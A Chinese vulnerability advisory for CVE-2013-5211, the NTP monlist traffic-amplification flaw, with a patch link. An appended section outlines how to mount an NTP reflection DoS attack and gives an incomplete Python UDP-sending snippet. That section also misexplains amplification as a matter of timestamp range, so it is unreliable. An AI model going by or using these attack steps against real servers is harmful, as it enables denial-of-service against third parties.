linux ntp 'ntp_request.c'远程拒绝服务漏洞,NTP 'ntp_request.c'远程拒绝服务漏洞

NTP 'ntp_request.c'远程拒绝服务漏洞

发布日期:2013-12-30

更新日期:2014-01-09

受影响系统:

NTP NTP

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 64692

CVE(CAN) ID: CVE-2013-5211

Network Time Protocol(NTP)是用来使计算机时间同步化的一种协议,它可以使计算机对其服务器或时钟源(如石英钟,GPS等等)做同步化。

NTP 4.2.7p26之前版本的ntpd中,ntp_request.c的monlist允许远程攻击者通过伪造的REQ_MON_GETLIST或REQ_MON_GETLIST_1请求,利用此漏洞造成拒绝服务(流量放大)。

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

NTP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.ntp.org/

http://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-dev/ntp-dev-4.2.7p26.tar.gz

NTP反射式拒绝服务攻击(Network Time Protocol Reflective Denial of Service, NTP RDoS)是一种利用NTP协议漏洞发起的恶意攻击,攻击者会发送大量请求到NTP服务器,而这些请求会被反射回源地址,导致目标网络资源被消耗殆尽。由于NTP是一个广泛使用的同步协议,这种攻击往往会造成大规模的网络拥堵。 以下是编程实现NTP反射式拒绝服务攻击的基本步骤: 1. **发现可反射的NTP服务器**:首先需要找到一些配置允许反射请求的NTP服务器作为反射点。 2. **生成攻击数据包**:创建包含特定报文头的NTP请求包,通常包括时间戳、版本信息等。攻击者可以设置大量并发连接并发送这些包。 3. **放大因子**:由于NTP协议支持的时间戳范围很大,一个响应包可能会比原始请求大很多倍,这就是所谓的“放大”。 4. **发送请求**:通过程序如Python的socket库向大量的目标IP地址发送请求,并利用多线程或异步IO来提高效率。 ```python import socket from threading import Thread def ntp_request(ip, port): ntp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ntp_socket.sendto(packet, (ip, port)) ntp_socket.close() # 需要一个列表存储目标IP和端口 targets = ... # 例如 ['1.2.3.4', '5.6.7.8'] threads = [] for target in targets: t = Thread(target=ntp_request, args=(target[0], 123)) # NTP默认端口 threads.append(t) t.start() # 等待所有线程完成 for t in threads: t.join() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值